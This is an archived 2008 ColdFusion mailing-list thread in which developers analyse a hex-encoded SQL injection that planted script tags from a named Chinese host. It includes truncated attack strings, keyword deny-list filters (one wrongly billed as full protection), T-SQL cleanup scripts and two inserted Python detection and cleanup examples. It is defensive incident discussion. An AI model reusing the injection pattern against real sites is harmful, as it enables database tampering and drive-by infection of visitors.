What happens if you create those unscoped vars in onRequest?

Adrian

We are now using CF8 and want to take advantage of features in
application.cfc. In particular we want to take advantage of the missing
template handler of CF8 application.cfc.

However, in our current application.cfm file we had defined 20 or so
variables that were not scoped (e.g. xcachepath="/cache"). In
application.cfc, these variables evidently need to be scoped (e.g.
request.xcachepath="/cache"). This is a huge website and the thought of
searching and replacing these variables and then uploading each one of
thousands of files to our production server is daunting and could take many
days of work.

If there is no workaround to the above problem, can the missing template
handler be used in the application.cfm?

Many thanks in advance. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309347


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Andy Matthews
Mutha!!!

Our company JUST had this happen. We're working through it right now.

Thanks for the confirmation guys. Appreciated.

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 10:42 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Works great for me.  You have to remove the extra line breaks though.
Here is what it does:  

Did you read the blog I posted?  It explains it all.

-Original Message-
From: Che Vilnonis [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 10:32 AM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Tried printing the code in SQL Analyzer and got nothing. Can anyone
translate it to text? Not sure what I am missing.

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x... AS CHAR(4000));EXEC(@S);

-Original Message-
From: Gerald Guido [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:12 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Why bother looking around the internet?  Use your SQL server to decode
it!

Huh... Learn sumptin new every day. That is why I keep coming back here.
;)

Thanx Brad.

~G~






Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309348


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Josh Nathanson
I am seeing these too on our site, in errors generated by bad data going 
into a cfqueryparam.

If several people on this list are seeing this attack, it must be pretty 
widespread.

-- Josh

- Original Message - 
From: Che Vilnonis [EMAIL PROTECTED]
To: CF-Talk cf-talk@houseoffusion.com
Sent: Monday, July 21, 2008 7:54 AM
Subject: SPAM (ot) URL Hack Attempt Leaves Me Scratching My Head...


 Just was looking at a 'user monitor' page on one of my sites and I saw the
 url string below being called. I've seen several sql injection urls 
 before,
 but what the heck are they trying to accomplish here? Everything is
 cfqueryparam'ed. Thanks, Che

 /rss.cfm?';DECLARE @S CHAR(4000);SET
 @S=CAST(0x... AS CHAR(4000));EXEC(@S);



 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309349


Re: Instantiated CFC behaving incorrectly in IE7 Safari, but works in Firefox

2008-07-21 Thread Russ Shakespear
 I've got a simple component that I'm instantiating to 

There is nothing in the code you've shown that is browser-specific. So, the
problem is somewhere else.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

You were right. I have been troubleshooting this code when all along it was an 
AJAX issue. I was starting to think I was going crazy over this. 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309350


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Kris Jones
We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.

-KJ

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309351


Re: Experiences with Railo

2008-07-21 Thread Jordan Michaels
H-Sphere was unfortunately bought by the same folks that own Plesk - a
company now called Parallels. I would not be surprised if they attempt
to move H-Sphere users toward Plesk in the very near future.

Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a
whole host of very popular hosting-related software. They went through a
buying spree about 6 months ago - buying up their competitors and
absorbing their products and their customers. Some of the victims of
this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor)
and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has
been halted, and Parallels has made no attempts to offer a migration
path for customers who were using them. This has cost my company tens of
thousands of dollars in migration efforts away from CP+ and FreeVPS.
It's a crying shame because both FreeVPS and CP+ were *excellent*
products, and served us very well for many years.

Parallels also publicly stated that they would offer migration paths for
customers who were affected by their acquisitions - this never happened.
Despite my phone calls and emails asking for said promised service. They
never came through.

Parallels lies. I do not trust them. I will not use, nor would I
recommend their products, or products owned by them, to anyone.

Warm regards,
Jordan Michaels
Vivio Technologies
http://www.viviotech.net/
Open BlueDragon Steering Committee
Adobe Solution Provider


Gerald Guido wrote:
 Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The
 one thing I really liked about it was being able to use the API to manage
 email accounts and user accounts right in our CMS. Anything to not have the
 phone ring off the hook
 
 If you ever need a Hosting CP I would look at H-sphere. I have run into a
 few minor speed bumps with it, but overall I have been very happy with it
 over the years.  They have a single server version for *nix.. I think it is
 free cuz I can't find a price for it. Anyways it is only $4.50 per client
 licence for the full blown version.
 
 http://www.psoft.net/promo/single_server.html
 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309352


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Gerald Guido
We're getting hit hard today with this.

/rss.cfm?

Is it just rss.cfm? I haven't looked at our logs yet. Where did you see
this? The server log files?

~~G~~

On Mon, Jul 21, 2008 at 12:53 PM, Kris Jones [EMAIL PROTECTED]
wrote:

 We're getting hit hard today with this. They're failing, because we
 use cfqueryparam and cfprocparam. But it is quite annoying.

 -KJ

 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309353


Re: Experiences with Railo

2008-07-21 Thread Jordan Michaels
Please accept my apologies. I should not have stated this on a public
mailing list. It was an emotional response to past experiences that I
should have kept under control.

Again, my apologies.

Warm regards,
Jordan Michaels
Vivio Technologies
http://www.viviotech.net/
Open BlueDragon Steering Committee
Adobe Solution Provider


Jordan Michaels wrote:
 H-Sphere was unfortunately bought by the same folks that own Plesk - a
 company now called Parallels. I would not be surprised if they attempt
 to move H-Sphere users toward Plesk in the very near future.
 
 Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a
 whole host of very popular hosting-related software. They went through a
 buying spree about 6 months ago - buying up their competitors and
 absorbing their products and their customers. Some of the victims of
 this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor)
 and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has
 been halted, and Parallels has made no attempts to offer a migration
 path for customers who were using them. This has cost my company tens of
 thousands of dollars in migration efforts away from CP+ and FreeVPS.
 It's a crying shame because both FreeVPS and CP+ were *excellent*
 products, and served us very well for many years.
 
 Parallels also publicly stated that they would offer migration paths for
 customers who were affected by their acquisitions - this never happened.
 Despite my phone calls and emails asking for said promised service. They
 never came through.
 
 Parallels lies. I do not trust them. I will not use, nor would I
 recommend their products, or products owned by them, to anyone.
 
 Warm regards,
 Jordan Michaels
 Vivio Technologies
 http://www.viviotech.net/
 Open BlueDragon Steering Committee
 Adobe Solution Provider
 
 
 Gerald Guido wrote:
 Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The
 one thing I really liked about it was being able to use the API to manage
 email accounts and user accounts right in our CMS. Anything to not have the
 phone ring off the hook

 If you ever need a Hosting CP I would look at H-sphere. I have run into a
 few minor speed bumps with it, but overall I have been very happy with it
 over the years.  They have a single server version for *nix.. I think it is
 free cuz I can't find a price for it. Anyways it is only $4.50 per client
 licence for the full blown version.

 http://www.psoft.net/promo/single_server.html

 
 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309354


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Good on ya, mate.  If there were an award for using cfqueryparam I would
give it to you.

Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?

Maybe we should write one to promote security in the CF community.

~Brad

-Original Message-
From: Kris Jones [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 11:53 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

We're getting hit hard today with this. They're failing, because we
use cfqueryparam and cfprocparam. But it is quite annoying.

-KJ

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309355


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Joshua Cyr
I was just looking into that myself.

http://qpscanner.riaforge.org/

On Mon, Jul 21, 2008 at 1:06 PM, Brad Wood [EMAIL PROTECTED]
wrote:

 Good on ya, mate.  If there were an award for using cfqueryparam I would
 give it to you.

 Since this seems to be such a hot topic right now, has anyone heard of a
 CFML code scanner to check for vulnerable cfqueries kind of like the var
 scoper does?

 Maybe we should write one to promote security in the CF community.

 ~Brad

 -Original Message-
 From: Kris Jones [mailto:[EMAIL PROTECTED]
 Sent: Monday, July 21, 2008 11:53 AM
 To: CF-Talk
 Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

 We're getting hit hard today with this. They're failing, because we
 use cfqueryparam and cfprocparam. But it is quite annoying.

 -KJ

 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309356


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Che Vilnonis
+1
Good idea! 

-Original Message-
From: Brad Wood [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 1:06 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Good on ya, mate.  If there were an award for using cfqueryparam I would
give it to you.

Since this seems to be such a hot topic right now, has anyone heard of a
CFML code scanner to check for vulnerable cfqueries kind of like the var
scoper does?

Maybe we should write one to promote security in the CF community.

~Brad

-Original Message-
From: Kris Jones [mailto:[EMAIL PROTECTED]
Sent: Monday, July 21, 2008 11:53 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

We're getting hit hard today with this. They're failing, because we use
cfqueryparam and cfprocparam. But it is quite annoying.

-KJ



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309357


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Sweet nectar... I'm trying this out and blogging it tonight.  If it's
pretty easy to run I think we should promote an international check your
freakin' cfqueries day!  Who wants to buy the party hats and streamers?

~Brad

-Original Message-
From: Joshua Cyr [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 12:09 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

I was just looking into that myself.

http://qpscanner.riaforge.org/

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309358


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread james carberry
Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x... AS CHAR(4000));EXEC(@S);

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309359


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread james carberry
Even easier than monkeying with every single one of your cfqueries, just add the 
following line to the TOP of all your application.cfm's:

<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

This will immediately shut down execution of any CFM that this piece of trash 
tries to invoke to execute this particular type of SQL for.

peace, j

Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x... AS
CHAR(4000));EXEC(@S); 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309360


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Kris Jones
It'll show in your logs of course. We also have error reports that
dump the error info and certain collections and mail it to the dev
team.

-KJ

We're getting hit hard today with this.

/rss.cfm?

 Is it just rss.cfm? I haven't looked at our logs yet. Where did you see
 this? The server log files?


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309361
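The two things this thread says to do with these requests, spotting them in the web-server log and decoding the 0x... literal (Brad's "use your SQL server to decode it"), as an added example that is not code from any poster. It decodes the hex offline so nothing is handed to a database; the log lines, addresses and the stand-in payload are constructed.

```python
"""Triage hex-encoded SQL injection attempts found in web-server logs.

Added example for this thread, not code from any of the posters. Scans log
lines for the shape seen here (DECLARE @S ...; SET @S=CAST(0x... AS ...); EXEC(@S))
and decodes the hex so a responder can read the SQL without executing it.
"""
import re
from urllib.parse import unquote_plus

# DECLARE @S CHAR(4000);SET @S=CAST(0x<hex> AS ...  -- the variable name is back-referenced
INJECT_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*;\s*"
    r"SET\s+@\1\s*=\s*CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\b",
    re.IGNORECASE,
)


def decode_hex_sql(hex_digits: str) -> str:
    """Decode a 0x... literal to the text it carries (what SELECT CAST(0x... AS CHAR) would show)."""
    if len(hex_digits) % 2:
        # A truncated log line can leave a dangling nibble; drop it rather than fail.
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("latin-1")


def scan_line(line: str):
    """Return the decoded payload if the line carries the CAST(0x...) shape, else None.

    IIS writes '+' for spaces and %xx escapes in cs-uri-query, so decode before matching.
    """
    match = INJECT_RE.search(unquote_plus(line))
    if match is None:
        return None
    return decode_hex_sql(match.group(2))


def scan_log(lines):
    """Return [(line_number, decoded_sql), ...] for every hit in an iterable of log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        sql = scan_line(line)
        if sql is not None:
            hits.append((number, sql))
    return hits


# --- constructed sample data -------------------------------------------------
# Harmless stand-in payload: the attack in the thread opened with this kind of
# catalog query over sysobjects/syscolumns to find the text columns to modify.
SAMPLE_SQL = ("select a.name,b.name from sysobjects a,syscolumns b "
              "where a.id=b.id and a.xtype='u'")
SAMPLE_HEX = SAMPLE_SQL.encode("ascii").hex().upper()

# Constructed IIS W3C-style lines: date time s-ip method uri-stem uri-query port - c-ip agent status
SAMPLE_LOG = [
    "2008-07-21 15:54:02 192.0.2.10 GET /rss.cfm feed=news 80 - 198.51.100.7 Mozilla/4.0 200",
    "2008-07-21 15:54:09 192.0.2.10 GET /rss.cfm ';DECLARE+@S+CHAR(4000);SET+@S=CAST(0x"
    + SAMPLE_HEX + "+AS+CHAR(4000));EXEC(@S); 80 - 198.51.100.7 Mozilla/4.0 500",
    "2008-07-21 15:55:41 192.0.2.10 GET /index.cfm id=42%20 80 - 203.0.113.5 Mozilla/4.0 200",
]

if __name__ == "__main__":
    for number, sql in scan_log(SAMPLE_LOG):
        print(f"line {number}: {sql}")
```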


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Dave Watts
 Even easier than monkeying with every single one of your 
 cfqueries, just add the following line to the TOP of all your 
 application.cfm's:
 
 <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO 
 contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309362


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
Band-Aids and duct tape...

Filtering for known attacks:  moderately useful as a stopgap if you are
in the middle of an attack.

Holistic approach to seal the original vulnerability against ALL current
and future attacks (cfqueryparam): highly desirable.

~Brad

-Original Message-
From: james carberry [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 12:54 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

Even easier than monkeying with every single one of your cfqueries,
just add the following line to the TOP of all your application.cfm's:

<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC("
OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

This will immediately shut down execution of any CFM that this piece of
trash tries to invoke to execute this particular type of SQL for.

peace, j

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309363


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread james carberry
Just put the following line at the TOP of your application.cfm to inoculate 
your CF webs against this attack:

<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

peace, j

Just was looking at a 'user monitor' page on one of my sites and I saw the
url string below being called. I've seen several sql injection urls before,
but what the heck are they trying to accomplish here? Everything is
cfqueryparam'ed. Thanks, Che

/rss.cfm?';DECLARE @S CHAR(4000);SET
@S=CAST(0x... AS
CHAR(4000));EXEC(@S); 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309364


Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Wayne Janeck
We had the same hack on our site, did you guys figure out exactly what happened 
or how and where the sql was run? Or what the hacker's purpose was? 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309365


RE: (ot) URL Hack Attempt Leaves Me Scratching My Head...

2008-07-21 Thread Brad Wood
The hacker's hope is that you will be outputting one of those varchar
fields into a webpage without escaping HTML characters.  The extra text
being inserted into the database fields will include a malicious
JavaScript file from another server into the webpage.  I haven't looked
at the JS to see what it does, but it probably tries to load some Trojan
via an ActiveX applet or something.

To clean your database, I would recommend reverse-engineering the attack
to loop over your database columns and remove the text they placed in
there.  In the meantime, shut your site down so you don't infect your
customers.

~Brad

-Original Message-
From: Wayne Janeck [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 1:43 PM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scratching My Head...

We had the same hack on our site, did you guys figure out exactly what
happened or how and where the sql was run? Or what the hacker's purpose
was? 

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309366


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
 The hacker's hope is that you will be outputting one of those 
 varchar fields into a webpage without escaping HTML 
 characters.  The extra text being inserted into the database 
 fields will include a malicious JavaScript file from another 
 server into the webpage.  I haven't looked at the JS to see 
 what it does, but it probably tries to load some Trojan via 
 an active X applet or something.
 
 To clean your database, I would recommend reverse-engineering 
 the attack to loop over your database columns and remove the 
 text they placed in there.  In the mean time, shut your site 
 down so you don't infect your customers.

For what it's worth, the specific URL that was injected in the sample I saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.

Second, if you can restore a previous copy of the database, that might be
easier.

Also, I'd recommend that you identify the problem scripts that contain the
vulnerability before you restore the database. Otherwise, you might have to
repeat the process.

Finally, you might consider implementing filtering at the web server to
block long (and presumably problematic) URLs before they're even sent to CF.
If you're using IIS, you can do that with the latest version of URLScan. If
you're using Apache, I think mod_security will let you do this.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309367


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
 If several people on this list are seeing this attack, it must be pretty
widespread.

Until now, I just check for the strings "http" or "user" in url.id 
containing something other than an integer value.
I now just added "DECLARE" to the validation.

All my templates expecting id=some numeric
start with this code (included):
<CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS "user" OR id 
CONTAINS "DECLARE")>
 <!--- save IP of this guy in the banned addresses table... --->
</CFIF>

This is even more efficient than CFQUERYPARAM, because this way I'm sure 
the guy will not have another chance.

-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309368


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Brad Wood
For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.

===

Yeah, that sucks, I was going to dissect it.  It appears that DNS is
resolving it to 127.0.0.1.  I didn't know you could do that.  verynx.cn
resolves to 121.12.169.186, but it returns a 404 when I submit a GET for
w.js.   

Hmm, some off-shore joint.  Asia Pacific Network Information Centre
owns the IP the domain resolves to.  Shows up as possibly being in
Beijing, China.

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309369


Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Claude Schneegans
 For what it's worth, the specific URL that was injected in the sample I
saw
(http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name
doesn't resolve.

===

Yeah, that sucks, I was going to dissect it.

It is broken now, but this morning I was able to see the code.
Apparently all it was doing was to document.write some code containing 
an iFrame with an address to another Chinese site:
http://ll80.com/.
I've opened the site, but it is all Chinese for me ;-)

-- 
___
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: [EMAIL PROTECTED])
Thanks.


Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309370


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Dave Watts
 Until now, I just check for strings http or user in 
 url.id containing something else than an integer value.
 I now just added DECLARE in the validation.
 
 All my templates expecting id=some numeric start with this 
 code (included):
 <CFIF val(id) EQ 0 AND (id CONTAINS "http" OR id CONTAINS 
 "user" OR id CONTAINS "DECLARE")> <!--- save IP of this guy in 
 the banned addresses table... --->
 </CFIF>
 
 This is even more efficient than CFQUERYPARAM, because this 
 way I'm sure the guy will not have another chance.

That's fine, until the attack pattern contains something else, like Unicode
sequences. Figuring out what patterns to deny is a losing battle. It's much
more efficient to simply allow only acceptable actions, which is what
CFQUERYPARAM does.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309371


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Mark Kruger
For those of you who have been hit by this attack and who need to try
something short of restoring your DB, this script will generate a series of
update statements in reverse of the hack that's been going around:

---
DECLARE @T varchar(255), @C varchar(255)
DECLARE @sql varchar(4000)
DECLARE @script varchar(255)
/* fill in the value of the malicious script, exactly as it appears in your data */
select @script = '<script src=*scriptsrc></script><!---'

/* every column of every user table whose type is ntext (99), text (35),
   nvarchar (231) or varchar (167) */
DECLARE Table_Cursor CURSOR FOR 
  SELECT a.name, b.name 
  FROM sysobjects a, syscolumns b 
  WHERE a.id = b.id AND a.xtype = 'u' 
  AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167) 

OPEN Table_Cursor 
  FETCH NEXT FROM Table_Cursor INTO @T, @C 
WHILE (@@FETCH_STATUS = 0) 
  BEGIN
/* builds:  update [T] set [C] = Replace([C],'<script ...>','')
   note: REPLACE() does not accept text/ntext columns (xtype 35/99) directly;
   those need a CAST to varchar first */
SELECT @sql = 'update [' + @T +'] set ['+ @C +'] = Replace(['  +
@C + '],''' + @script + ''','''')'
PRINT @sql

/*uncomment this after checking the output using print */
--EXEC(@sql)

FETCH NEXT FROM Table_Cursor INTO @T, @C
 END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

---

1) Replace the value of @script (the select at the top) with the value of
the string that's been inserted into your DB
2) Run the script AS IS - you should see a list of update statements that
look like this:

update [**tablename] set [**columnName] = Replace([**ColumnName],'<script
src=*scriptsrc></script><!---','')

Where **tablename and **columname represent actual tables/columns from your
DB.

You can then run the updates individually to strip out the malicious code...
I also converted the update to a select to compare the values and see what
the result would be on update.

3) If you are brave you can comment out the EXEC(@sql) line and rerun the
script. Doing so will hit every table and every char column with these
updates so be sure you know what you are doing. 


-Mark
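
The column-walking cleanup that the two T-SQL scripts in this thread perform, as an added example that is not part of any post here: it is written in Python against an in-memory SQLite database so it runs offline (SQL Server's sysobjects/syscolumns are replaced by sqlite_master and PRAGMA table_info), the MARKER string and the sample tables are constructed, and the statements are printed as a dry run before anything is executed, the same "check the PRINT output before you EXEC" discipline Mark describes.

```python
"""Walk every character column of a database, report which ones contain an
injected string, then generate and optionally run REPLACE-based cleanup.
Added example: SQLite stands in for SQL Server so it runs offline."""
import sqlite3

# Constructed marker standing in for the injected tag; on a real database
# you paste the exact string found in your columns.
MARKER = '<script src="http://EXAMPLE-INJECTED/w.js"></script><!--'


def build_sample_db():
    """Constructed sample database with a mix of clean and affected rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT, price REAL);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(255), body TEXT);
    """)
    conn.executemany("INSERT INTO products VALUES (?,?,?,?)", [
        (1, "Widget" + MARKER, "A widget" + MARKER, 9.99),
        (2, "Gadget", "A gadget", 19.99),
    ])
    conn.executemany("INSERT INTO news VALUES (?,?,?)", [
        (1, "Hello", "Body text" + MARKER),
        (2, "Clean", "Nothing here"),
    ])
    conn.commit()
    return conn


def quote_ident(name):
    """SQL identifier quoting for SQLite: double quotes, embedded quotes doubled."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(conn):
    """(table, column) pairs whose declared type is character data; this is the
    SQLite equivalent of the syscolumns.xtype filter in the T-SQL scripts."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, col, ctype, *_ in conn.execute(f"PRAGMA table_info({quote_ident(table)})"):
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                cols.append((table, col))
    return cols


def find_infected(conn, marker):
    """Return {(table, column): affected_row_count} for columns holding the marker."""
    hits = {}
    for table, col in text_columns(conn):
        sql = f"SELECT COUNT(*) FROM {quote_ident(table)} WHERE instr({quote_ident(col)}, ?) > 0"
        n = conn.execute(sql, (marker,)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits


def cleanup_statements(conn, marker):
    """One UPDATE per affected column.  The marker is bound as a parameter, so
    quotes inside it cannot break the statement the way string concatenation can."""
    stmts = []
    for table, col in find_infected(conn, marker):
        t, c = quote_ident(table), quote_ident(col)
        stmts.append((f"UPDATE {t} SET {c} = replace({c}, ?, '') WHERE instr({c}, ?) > 0",
                      (marker, marker)))
    return stmts


def clean(conn, marker, execute=False):
    """Dry run by default: print the statements and return how many there are.
    Only with execute=True are they run, all inside one transaction."""
    stmts = cleanup_statements(conn, marker)
    for sql, params in stmts:
        print(sql, params)
    if execute:
        with conn:
            for sql, params in stmts:
                conn.execute(sql, params)
    return len(stmts)


if __name__ == "__main__":
    db = build_sample_db()
    print("before:", find_infected(db, MARKER))
    clean(db, MARKER)                 # dry run: statements only
    clean(db, MARKER, execute=True)
    print("after:", find_infected(db, MARKER))
```

Two things carry over to the SQL Server version: restrict the column list to character types before touching anything, and keep the replacement text out of the generated statement (a bound parameter here; on SQL Server, sp_executesql with a parameter does the same job as the string concatenation in the scripts above).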



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309372


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Andy Matthews
Dave...

What other ways are there? I know of two: EXEC and EXECUTE. 

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED] 
Sent: Monday, July 21, 2008 1:05 PM
To: CF-Talk
Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

 Even easier than monkeying with every single one of your cfquery's 
 just add following line to the TOP of all your
 application.cfm's:
 
 <cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains 
 "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

That would stop this specific problem, but would be easily circumvented by
using one of the other mechanisms for executing strings on SQL Server.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!



Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309373


RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...

2008-07-21 Thread Andy Matthews
Just an FYI...

Our DBA (Ryan Cooper) took this same route and this is what he came up with.
Thought I'd share this with the group on his behalf. He notes that you need
